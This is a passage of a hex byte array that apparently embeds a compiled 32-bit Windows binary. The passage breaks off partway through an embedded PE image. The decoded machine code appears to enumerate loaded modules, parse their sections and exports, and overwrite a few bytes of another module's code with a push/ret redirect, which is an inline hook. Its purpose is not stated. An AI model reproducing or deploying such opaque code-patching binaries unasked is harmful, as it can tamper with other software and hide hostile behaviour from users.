0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,\r\n0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,\r\n0xff,0xff,0xff,0xff,0xec,0x0a,0x00,0x10,0x00,0x0b,0x00,0x10,0x18,0x0b,0x00,0x10,\r\n0x34,0x0b,0x00,0x10,0x50,0x0b,0x00,0x10,0x64,0x0b,0x00,0x10,0x78,0x0b,0x00,0x10,\r\n0x40,0xbb,0x00,0x00,0xbf,0x44,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x08,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,\r\n0x74,0x38,0x8b,0x4d,0xfc,0x03,0x0d,0x84,0x2d,0x00,0x10,0x89,0x4d,0xf8,0x6a,0x01,\r\n0x8b,0x55,0x0c,0x52,0x8b,0x45,0xf8,0x50,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,\r\n0xc8,0x85,0xc9,0x74,0x05,0x8b,0x45,0xfc,0xeb,0x12,0x8b,0x55,0xfc,0x03,0x15,0x8c,\r\n0x2d,0x00,0x10,0x8b,0x02,0x89,0x45,0xfc,0xeb,0xc2,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,\r\n0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0x7d,0x0c,0x00,0x74,0x0f,0x8b,0x45,0x0c,0x03,0x05,0x90,0x2d,\r\n0x00,0x10,0x8b,0x00,0xeb,0x11,0xeb,0x0d,0x8b,0x4d,0x08,0x03,0x0d,0x88,0x2d,0x00,\r\n0x10,0x8b,0x01,0xeb,0x02,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x8b,0x45,0x08,0x03,0x05,0x94,0x2d,0x00,0x10,0x8b,0x00,0x5d,0xc2,\r\n0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x38,0xc7,0x45,0xe8,0x00,0x00,0x00,0x00,0x6a,0x0b,0xe8,\r\n0xbc,0xfb,0xff,0xff,0x89,0x45,0xf0,0x83,0x7d,0xf0,0x00,0x74,0x79,0xc7,0x45,0xe4,\r\n0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xe4,0x83,0xc0,0x01,0x89,0x45,0xe4,0x8b,\r\n0x4d,0xf0,0x8b,0x55,0xe4,0x3b,0x11,0x73,0x51,0x8b,0x45,0xe4,0x69,0xc0,0x1c,0x01,\r\n0x00,0x00,0x8b,0x4d,0xf0,0x8b,0x55,0x08,0x3b,0x54,0x01,0x0c,0x76,0x3a,0x8b,0x45,\r\n0xe4,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xe4,0x69,0xc9,0x1c,0x01,0x00,0x00,\r\n0x8b,0x55,0xf0,0x8b,0x44,0x02,0x0c,0x8b,0x55,0xf0,0x03,0x44,0x0a,0x10,0x39,0x45,\r\n0x08,0x73,0x15,0x8b,0x45,0xe4,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xf0,0x8b,\r\n0x54,0x01,0x0c,0x89,0x55,0xe8,0xeb,0x02,0xeb,0x9c,0x6a,0x00,0x8b,0x45,0xf0,0x50,\r\n0xff,0x15,0x90,0x02,0x00,0x10,0x83,0x7d,0xe8,0x00,0x75,0x08,0x8b,0x45,0x0c,0xe9,\r\n0x5c,0x01,0x00,0x00,0x8b,0x4d,0xe8,0x8b,0x55,0xe8,0x03,0x51,0x3c,0x89,0x55,0xfc,\r\n0x8b,0x45,0xfc,0x0f,0xb7,0x48,0x14,0x8b,0x55,0xfc,0x8d,0x44,0x0a,0x18,0x89,0x45,\r\n0xec,0x6a,0x06,0x6a,0x00,0x8d,0x4d,0xf4,0x51,0xe8,0xf0,0xfb,0xff,0xff,0x83,0xc4,\r\n0x0c,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0xeb,0x12,0x8b,0x55,0xe0,0x83,0xc2,0x01,\r\n0x89,0x55,0xe0,0x8b,0x45,0xec,0x83,0xc0,0x28,0x89,0x45,0xec,0x8b,0x4d,0xfc,0x0f,\r\n0xb7,0x51,0x06,0x39,0x55,0xe0,0x0f,0x83,0x01,0x01,0x00,0x00,0x68,0xc8,0x07,0x00,\r\n0x10,0x8b,0x45,0xec,0x50,0xe8,0x4a,0xfc,0xff,0xff,0x83,0xc4,0x08,0x85,0xc0,0x0f,\r\n0x85,0xe3,0x00,0x00,0x00,0x8b,0x4d,0xec,0x8b,0x51,0x24,0x81,0xe2,0x00,0x00,0x00,\r\n0x20,0x0f,0x84,0xd1,0x00,0x00,0x00,0x8b,0x45,0xec,0x8b,0x48,0x24,0x81,0xe1,0x00,\r\n0x00,0x00,0x02,0x0f,0x85,0xbf,0x00,0x00,0x00,0x8b,0x55,0xfc,0x8b,0x42,0x38,0x83,\r\n0xe8,0x01,0x8b,0x4d,0xec,0x23,0x41,0x08,0x74,0x1c,0x8b,0x55,0xfc,0x8b,0x42,0x38,\r\n0x83,0xe8,0x01,0xf7,0xd0,0x8b,0x4d,0xec,0x23,0x41,0x08,0x8b,0x55,0xfc,0x03,0x42,\r\n0x38,0x89,0x45,0xc8,0xeb,0x09,0x8b,0x45,0xec,0x8b,0x48,0x08,0x89,0x4d,0xc8,0x8b,\r\n0x55,0xc8,0x89,0x55,0xdc,0x8b,0x45,0xec,0x8b,0x4d,0xdc,0x2b,0x48,0x08,0x89,0x4d,\r\n0xd8,0x83,0x7d,0xd8,0x06,0x76,0x71,0x8b,0x55,0xec,0x8b,0x42,0x0c,0x8b,0x4d,0xec,\r\n0x03,0x41,0x08,0x03,0x45,0xe8,0x89,0x45,0xd4,0x8b,0x55,0xd8,0x83,0xea,0x06,0x89,\r\n0x55,0xd0,0xeb,0x09,0x8b,0x45,0xd0,0x83,0xe8,0x01,0x89,0x45,0xd0,0x83,0x7d,0xd0,\r\n0x00,0x74,0x45,0x8b,0x4d,0xd4,0x03,0x4d,0xd0,0x89,0x4d,0xcc,0x6a,0x06,0x8d,0x55,\r\n0xf4,0x52,0x8b,0x45,0xcc,0x50,0xff,0x15,0xe8,0x02,0x00,0x10,0x83,0xf8,0x06,0x75,\r\n0x25,0xe8,0xea,0x1e,0x00,0x00,0x8b,0x4d,0xcc,0xc6,0x01,0x68,0x8b,0x55,0xcc,0x8b,\r\n0x45,0x0c,0x89,0x42,0x01,0x8b,0x4d,0xcc,0xc6,0x41,0x05,0xc3,0xe8,0xef,0x1e,0x00,\r\n0x00,0x8b,0x45,0xcc,0xeb,0x0a,0xeb,0xac,0xe9,0xdd,0xfe,0xff,0xff,0x8b,0x45,0x0c,\r\n0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x28,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0xe8,0xee,0xde,\r\n0xff,0xff,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x0f,0x84,0x26,0x01,0x00,0x00,0x68,\r\n0xd0,0x07,0x00,0x10,0x8d,0x45,0xec,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x8d,0x4d,\r\n0xec,0x51,0x8b,0x55,0xfc,0x52,0xe8,0x05,0xfd,0xff,0xff,0x89,0x45,0xf4,0x83,0x7d,\r\n0xf4,0x00,0x0f,0x84,0xeb,0x00,0x00,0x00,0x8b,0x45,0xf4,0x50,0x68,0xdc,0x07,0x00,\r\n0x10,0xe8,0x4c,0xfa,0xff,0xff,0x83,0xc4,0x08,0xc7,0x45,0xe8,0x00,0x00,0x00,0x00,\r\n0x8b,0x4d,0xe8,0x51,0x8b,0x55,0xf4,0x52,0xe8,0x33,0xfd,0xff,0xff,0x89,0x45,0xe8,\r\n0x83,0x7d,0xe8,0x00,0x0f,0x84,0xb7,0x00,0x00,0x00,0x8b,0x45,0xe8,0x50,0xe8,0x4d,\r\n0xfd,0xff,0xff,0x89,0x45,0xe4,0x83,0x7d,0xe4,0x00,0x0f,0x84,0x9c,0x00,0x00,0x00,\r\n0x8b,0x4d,0xe4,0x51,0x8b,0x55,0xe8,0x52,0x68,0x10,0x08,0x00,0x10,0xe8,0x00,0xfa,\r\n0xff,0xff,0x83,0xc4,0x0c,0x8b,0x45,0xe4,0x03,0x05,0x98,0x2d,0x00,0x10,0x8b,0x08,\r\n0x89,0x4d,0xe0,0x83,0x7d,0xe0,0x00,0x75,0x02,0xeb,0xa5,0x8b,0x55,0xe0,0x03,0x15,\r\n0xa0,0x2d,0x00,0x10,0x8b,0x02,0x89,0x45,0xd8,0x83,0x7d,0xd8,0x00,0x75,0x02,0xeb,\r\n0x8f,0x8b,0x4d,0x08,0x51,0x68,0xb0,0x21,0x00,0x10,0xe8,0xe1,0xf3,0xff,0xff,0x50,\r\n0x8b,0x55,0xe4,0x52,0x8b,0x45,0xd8,0x50,0xe8,0x83,0xee,0xff,0xff,0x89,0x45,0xdc,\r\n0x83,0x7d,0xdc,0x00,0x74,0x36,0x8b,0x4d,0xdc,0x51,0x8b,0x55,0xd8,0x52,0xe8,0xed,\r\n0xfc,0xff,0xff,0x8b,0x4d,0xe0,0x03,0x0d,0xa0,0x2d,0x00,0x10,0x89,0x01,0x8b,0x55,\r\n0xdc,0x52,0x8b,0x45,0xd8,0x50,0x68,0x48,0x08,0x00,0x10,0xe8,0x82,0xf9,0xff,0xff,\r\n0x83,0xc4,0x0c,0x8b,0x4d,0xf8,0x83,0xc1,0x01,0x89,0x4d,0xf8,0xe9,0x2f,0xff,0xff,\r\n0xff,0xeb,0x0d,0x68,0x80,0x08,0x00,0x10,0xe8,0x65,0xf9,0xff,0xff,0x83,0xc4,0x04,\r\n0xe8,0xbb,0xde,0xff,0xff,0x8b,0x45,0xf8,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x83,0x7d,0x08,0x00,0x74,0x26,0xc7,0x45,0xfc,0x00,0x00,0x00,\r\n0x00,0xeb,0x09,0x8b,0x45,0xfc,0x83,0xc0,0x01,0x89,0x45,0xfc,0x8b,0x4d,0x08,0x03,\r\n0x4d,0xfc,0x0f,0xbe,0x11,0x85,0xd2,0x74,0x02,0xeb,0xe8,0x8b,0x45,0xfc,0xeb,0x02,\r\n0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x0c,0x8b,0x45,0x08,0x50,0xe8,0xb1,0xff,0xff,0xff,0x89,\r\n0x45,0xf8,0x8b,0x4d,0x0c,0x51,0xe8,0xa5,0xff,0xff,0xff,0x89,0x45,0xfc,0x8b,0x55,\r\n0xf8,0x3b,0x55,0xfc,0x74,0x07,0xb8,0x01,0x00,0x00,0x00,0xeb,0x3b,0xc7,0x45,0xf4,\r\n0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xf4,0x83,0xc0,0x01,0x89,0x45,0xf4,0x8b,\r\n0x4d,0xf4,0x3b,0x4d,0xf8,0x73,0x1f,0x8b,0x55,0x08,0x03,0x55,0xf4,0x0f,0xbe,0x02,\r\n0x8b,0x4d,0x0c,0x03,0x4d,0xf4,0x0f,0xbe,0x11,0x3b,0xc2,0x74,0x07,0xb8,0x01,0x00,\r\n0x00,0x00,0xeb,0x04,0xeb,0xd0,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x0c,0x50,0xe8,0x41,0xff,0xff,0xff,0x83,\r\n0xc0,0x01,0x89,0x45,0xfc,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d,\r\n0xf8,0x83,0xc1,0x01,0x89,0x4d,0xf8,0x8b,0x55,0xf8,0x3b,0x55,0xfc,0x73,0x12,0x8b,\r\n0x45,0x08,0x03,0x45,0xf8,0x8b,0x4d,0x0c,0x03,0x4d,0xf8,0x8a,0x11,0x88,0x10,0xeb,\r\n0xdd,0x8b,0x45,0x08,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x8b,0x45,0x08,0x89,0x45,0xfc,0xeb,0x09,0x8b,0x4d,0x08,0x83,\r\n0xc1,0x01,0x89,0x4d,0x08,0x8b,0x55,0xfc,0x52,0xe8,0xe2,0xfe,0xff,0xff,0x03,0x45,\r\n0xfc,0x39,0x45,0x08,0x77,0x26,0x8b,0x45,0x08,0x0f,0xbe,0x08,0x83,0xf9,0x41,0x7c,\r\n0x19,0x8b,0x55,0x08,0x0f,0xbe,0x02,0x83,0xf8,0x5a,0x7f,0x0e,0x8b,0x4d,0x08,0x0f,\r\n0xbe,0x11,0x83,0xc2,0x20,0x8b,0x45,0x08,0x88,0x10,0xeb,0xc0,0x8b,0x45,0xfc,0x8b,\r\n0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x0f,0xb7,0x45,0x08,0x83,0xf8,0x41,0x7c,0x12,0x0f,0xb7,0x4d,0x08,\r\n0x83,0xf9,0x5a,0x7f,0x09,0x0f,0xb7,0x45,0x08,0x83,0xc0,0x20,0xeb,0x04,0x66,0x8b,\r\n0x45,0x08,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x14,0x8b,0x45,0x08,0x0f,0xb7,0x08,0x8b,0x55,0x0c,0x0f,\r\n0xb7,0x02,0x3b,0xc8,0x7d,0x0c,0x8b,0x4d,0x08,0x66,0x8b,0x11,0x66,0x89,0x55,0xee,\r\n0xeb,0x0a,0x8b,0x45,0x0c,0x66,0x8b,0x08,0x66,0x89,0x4d,0xee,0x0f,0xb7,0x55,0xee,\r\n0xd1,0xea,0x66,0x89,0x55,0xfc,0xb8,0x01,0x00,0x00,0x00,0x66,0x89,0x45,0xf8,0xeb,\r\n0x0c,0x66,0x8b,0x4d,0xf8,0x66,0x83,0xc1,0x01,0x66,0x89,0x4d,0xf8,0x0f,0xb7,0x55,\r\n0xf8,0x0f,0xb7,0x45,0xfc,0x3b,0xd0,0x7d,0x71,0x8b,0x4d,0x08,0x0f,0xb7,0x11,0xd1,\r\n0xea,0x0f,0xb7,0x45,0xf8,0x2b,0xd0,0x8b,0x4d,0x08,0x8b,0x41,0x04,0x66,0x8b,0x0c,\r\n0x50,0x66,0x89,0x4d,0xf4,0x8b,0x55,0x0c,0x0f,0xb7,0x02,0xd1,0xe8,0x0f,0xb7,0x4d,\r\n0xf8,0x2b,0xc1,0x8b,0x55,0x0c,0x8b,0x4a,0x04,0x66,0x8b,0x14,0x41,0x66,0x89,0x55,\r\n0xf0,0x0f,0xb6,0x45,0x10,0x85,0xc0,0x74,0x1c,0x0f,0xb7,0x4d,0xf4,0x51,0xe8,0x2d,\r\n0xff,0xff,0xff,0x66,0x89,0x45,0xf4,0x0f,0xb7,0x55,0xf0,0x52,0xe8,0x1f,0xff,0xff,\r\n0xff,0x66,0x89,0x45,0xf0,0x0f,0xb7,0x45,0xf4,0x0f,0xb7,0x4d,0xf0,0x3b,0xc1,0x74,\r\n0x04,0x32,0xc0,0xeb,0x07,0xe9,0x77,0xff,0xff,0xff,0xb0,0x01,0x8b,0xe5,0x5d,0xc2,\r\n0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x1c,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0x8b,0x45,0x08,\r\n0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,0x4d,0xf8,0x8b,0x55,0xf8,0x0f,0xb7,0x42,0x04,\r\n0x3d,0x4c,0x01,0x00,0x00,0x75,0x17,0x8b,0x4d,0xf8,0x83,0x79,0x78,0x00,0x74,0x0c,\r\n0x8b,0x55,0xf8,0x8b,0x45,0x08,0x03,0x42,0x78,0x89,0x45,0xfc,0xeb,0x3c,0x8b,0x4d,\r\n0xf8,0x0f,0xb7,0x51,0x04,0x81,0xfa,0x64,0x86,0x00,0x00,0x75,0x29,0x8b,0x45,0x08,\r\n0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,0x4d,0xf4,0x8b,0x55,0xf4,0x83,0xba,0x88,0x00,\r\n0x00,0x00,0x00,0x74,0x0f,0x8b,0x45,0xf4,0x8b,0x4d,0x08,0x03,0x88,0x88,0x00,0x00,\r\n0x00,0x89,0x4d,0xfc,0xeb,0x04,0x33,0xc0,0xeb,0x7c,0x83,0x7d,0xfc,0x00,0x74,0x74,\r\n0x8b,0x55,0xfc,0x8b,0x45,0x08,0x03,0x42,0x1c,0x89,0x45,0xf0,0x8b,0x4d,0xfc,0x8b,\r\n0x55,0x08,0x03,0x51,0x24,0x89,0x55,0xec,0x8b,0x45,0xfc,0x8b,0x4d,0x08,0x03,0x48,\r\n0x20,0x89,0x4d,0xe8,0xc7,0x45,0xe4,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x55,0xe4,\r\n0x83,0xc2,0x01,0x89,0x55,0xe4,0x8b,0x45,0xfc,0x8b,0x4d,0xe4,0x3b,0x48,0x14,0x73,\r\n0x33,0x8b,0x55,0x0c,0x52,0x8b,0x45,0xe4,0x8b,0x4d,0xe8,0x8b,0x55,0x08,0x03,0x14,\r\n0x81,0x52,0xe8,0xf9,0xfc,0xff,0xff,0x85,0xc0,0x75,0x17,0x8b,0x45,0xe4,0x8b,0x4d,\r\n0xec,0x0f,0xbf,0x14,0x41,0x8b,0x45,0xf0,0x8b,0x4d,0x08,0x03,0x0c,0x90,0x8b,0xc1,\r\n0xeb,0x04,0xeb,0xb9,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x81,0xec,0x84,0x00,0x00,0x00,0xc7,0x45,0xc0,0x00,0x00,0x00,0x00,\r\n0x68,0x88,0x0c,0x00,0x10,0x8d,0x45,0xc4,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x68,\r\n0x98,0x0c,0x00,0x10,0x8d,0x4d,0xe0,0x51,0xff,0x15,0x20,0x03,0x00,0x10,0xc7,0x45,\r\n0xe8,0xb4,0x0c,0x00,0x10,0xc7,0x45,0xec,0xc4,0x0c,0x00,0x10,0xc7,0x45,0xf0,0xdc,\r\n0x0c,0x00,0x10,0xc7,0x45,0xf4,0xf4,0x0c,0x00,0x10,0xc7,0x45,0xf8,0x0c,0x0d,0x00,\r\n0x10,0xc7,0x45,0xfc,0x28,0x0d,0x00,0x10,0xc7,0x45,0xd0,0x44,0x0d,0x00,0x10,0xc7,\r\n0x45,0xd4,0x60,0x0d,0x00,0x10,0xc7,0x45,0xd8,0x7c,0x0d,0x00,0x10,0xc7,0x45,0xdc,\r\n0x98,0x0d,0x00,0x10,0x6a,0x0b,0xe8,0x85,0xf4,0xff,0xff,0x89,0x45,0xcc,0x83,0x7d,\r\n0xcc,0x00,0x0f,0x84,0xda,0x01,0x00,0x00,0x8b,0x55,0x08,0x52,0x8d,0x45,0xac,0x50,\r\n0xff,0x15,0x18,0x03,0x00,0x10,0x6a,0x01,0x8d,0x4d,0xac,0x51,0x8d,0x55,0xb4,0x52,\r\n0xff,0x15,0x14,0x03,0x00,0x10,0x89,0x45,0xbc,0x83,0x7d,0xbc,0x00,0x0f,0x8c,0xa3,\r\n0x01,0x00,0x00,0xc7,0x45,0xa8,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xa8,0x83,\r\n0xc0,0x01,0x89,0x45,0xa8,0x8b,0x4d,0xcc,0x8b,0x55,0xa8,0x3b,0x11,0x0f,0x83,0x79,\r\n0x01,0x00,0x00,0x8b,0x45,0xa8,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xcc,0x8d,\r\n0x54,0x01,0x04,0x8b,0x45,0xa8,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xcc,0x0f,\r\n0xb7,0x44,0x01,0x1e,0x8d,0x4c,0x02,0x1c,0x51,0x8d,0x55,0x9c,0x52,0xff,0x15,0x18,\r\n0x03,0x00,0x10,0x6a,0x01,0x8d,0x45,0x9c,0x50,0x8d,0x4d,0x94,0x51,0xff,0x15,0x14,\r\n0x03,0x00,0x10,0x89,0x45,0xa4,0x83,0x7d,0xa4,0x00,0x0f,0x8c,0x27,0x01,0x00,0x00,\r\n0x6a,0x01,0x8d,0x55,0xc4,0x52,0x8d,0x45,0xb4,0x50,0xff,0x15,0xa0,0x02,0x00,0x10,\r\n0x0f,0xb6,0xc8,0x85,0xc9,0x74,0x5d,0xc7,0x45,0x90,0x00,0x00,0x00,0x00,0xeb,0x09,\r\n0x8b,0x55,0x90,0x83,0xc2,0x01,0x89,0x55,0x90,0x83,0x7d,0x90,0x06,0x7d,0x40,0x8b,\r\n0x45,0x90,0x8b,0x4c,0x85,0xe8,0x51,0x8d,0x55,0x88,0x52,0xff,0x15,0x20,0x03,0x00,\r\n0x10,0x6a,0x01,0x8d,0x45,0x88,0x50,0x8d,0x4d,0x94,0x51,0xff,0x15,0xa0,0x02,0x00,\r\n0x10,0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x15,0x8b,0x45,0xa8,0x69,0xc0,0x1c,0x01,0x00,\r\n0x00,0x8b,0x4d,0xcc,0x8b,0x54,0x01,0x0c,0x89,0x55,0xc0,0xeb,0x02,0xeb,0xb1,0xe9,\r\n0xa1,0x00,0x00,0x00,0x6a,0x01,0x8d,0x45,0xe0,0x50,0x8d,0x4d,0xb4,0x51,0xff,0x15,\r\n0xa0,0x02,0x00,0x10,0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x60,0xc7,0x45,0x84,0x00,0x00,\r\n0x00,0x00,0xeb,0x09,0x8b,0x45,0x84,0x83,0xc0,0x01,0x89,0x45,0x84,0x83,0x7d,0x84,\r\n0x04,0x7d,0x46,0x8b,0x4d,0x84,0x8b,0x54,0x8d,0xd0,0x52,0x8d,0x85,0x7c,0xff,0xff,\r\n0xff,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x6a,0x01,0x8d,0x8d,0x7c,0xff,0xff,0xff,\r\n0x51,0x8d,0x55,0x94,0x52,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,0xc0,0x85,0xc0,\r\n0x74,0x15,0x8b,0x4d,0xa8,0x69,0xc9,0x1c,0x01,0x00,0x00,0x8b,0x55,0xcc,0x8b,0x44,\r\n0x0a,0x0c,0x89,0x45,0xc0,0xeb,0x02,0xeb,0xab,0xeb,0x2a,0x6a,0x01,0x8d,0x4d,0x94,\r\n0x51,0x8d,0x55,0xb4,0x52,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,0xc0,0x85,0xc0,\r\n0x74,0x13,0x8b,0x4d,0xa8,0x69,0xc9,0x1c,0x01,0x00,0x00,0x8b,0x55,0xcc,0x8b,0x44,\r\n0x0a,0x0c,0x89,0x45,0xc0,0x8d,0x4d,0x94,0x51,0xff,0x15,0x10,0x03,0x00,0x10,0x83,\r\n0x7d,0xc0,0x00,0x74,0x02,0xeb,0x05,0xe9,0x70,0xfe,0xff,0xff,0x8d,0x55,0xb4,0x52,\r\n0xff,0x15,0x10,0x03,0x00,0x10,0x6a,0x00,0x8b,0x45,0xcc,0x50,0xff,0x15,0x90,0x02,\r\n0x00,0x10,0x8b,0x45,0xc0,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0x83,0x7d,0x08,0x00,0x0f,0x85,0xc9,0x00,0x00,0x00,\r\n0x8b,0x45,0x0c,0x89,0x45,0xf8,0x8b,0x4d,0xf8,0x8b,0x51,0x0c,0x52,0x8b,0x45,0xf8,\r\n0x8b,0x48,0x0c,0x51,0xe8,0x87,0xf0,0xff,0xff,0x0f,0xb6,0xd0,0x85,0xd2,0x75,0x07,\r\n0x32,0xc0,0xe9,0xa4,0x00,0x00,0x00,0x8b,0x45,0xf8,0x8b,0x08,0x89,0x0d,0x18,0x2e,\r\n0x00,0x10,0x8b,0x55,0xf8,0x8b,0x42,0x0c,0xa3,0x1c,0x2e,0x00,0x10,0x8b,0x4d,0xf8,\r\n0x8b,0x11,0x52,0x68,0xb4,0x0d,0x00,0x10,0x8b,0x45,0xf8,0x8b,0x48,0x0c,0x51,0xe8,\r\n0xdc,0xee,0xff,0xff,0x0f,0xb6,0xd0,0x85,0xd2,0x75,0x04,0x32,0xc0,0xeb,0x6c,0xa1,\r\n0x18,0x2e,0x00,0x10,0x50,0x68,0xc4,0x0d,0x00,0x10,0xe8,0xf3,0xf2,0xff,0xff,0x83,\r\n0xc4,0x08,0x68,0xf0,0x0d,0x00,0x10,0xe8,0x04,0xfd,0xff,0xff,0x89,0x45,0xfc,0x83,\r\n0x7d,0xfc,0x00,0x74,0x33,0x8b,0x4d,0xfc,0x51,0x68,0xfc,0x0d,0x00,0x10,0xe8,0xcf,\r\n0xf2,0xff,0xff,0x83,0xc4,0x08,0x8b,0x55,0xfc,0x52,0x68,0x28,0x0e,0x00,0x10,0x8b,\r\n0x45,0xf8,0x8b,0x48,0x0c,0x51,0xe8,0x85,0xee,0xff,0xff,0x0f,0xb6,0xd0,0x85,0xd2,\r\n0x75,0x04,0x32,0xc0,0xeb,0x15,0xeb,0x11,0x68,0x34,0x0e,0x00,0x10,0xe8,0xa0,0xf2,\r\n0xff,0xff,0x83,0xc4,0x04,0x32,0xc0,0xeb,0x02,0xb0,0x01,0x8b,0xe5,0x5d,0xc2,0x08,\r\n0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00,\r\n0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x00,0x00,0x00,\r\n0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,\r\n0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,\r\n0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0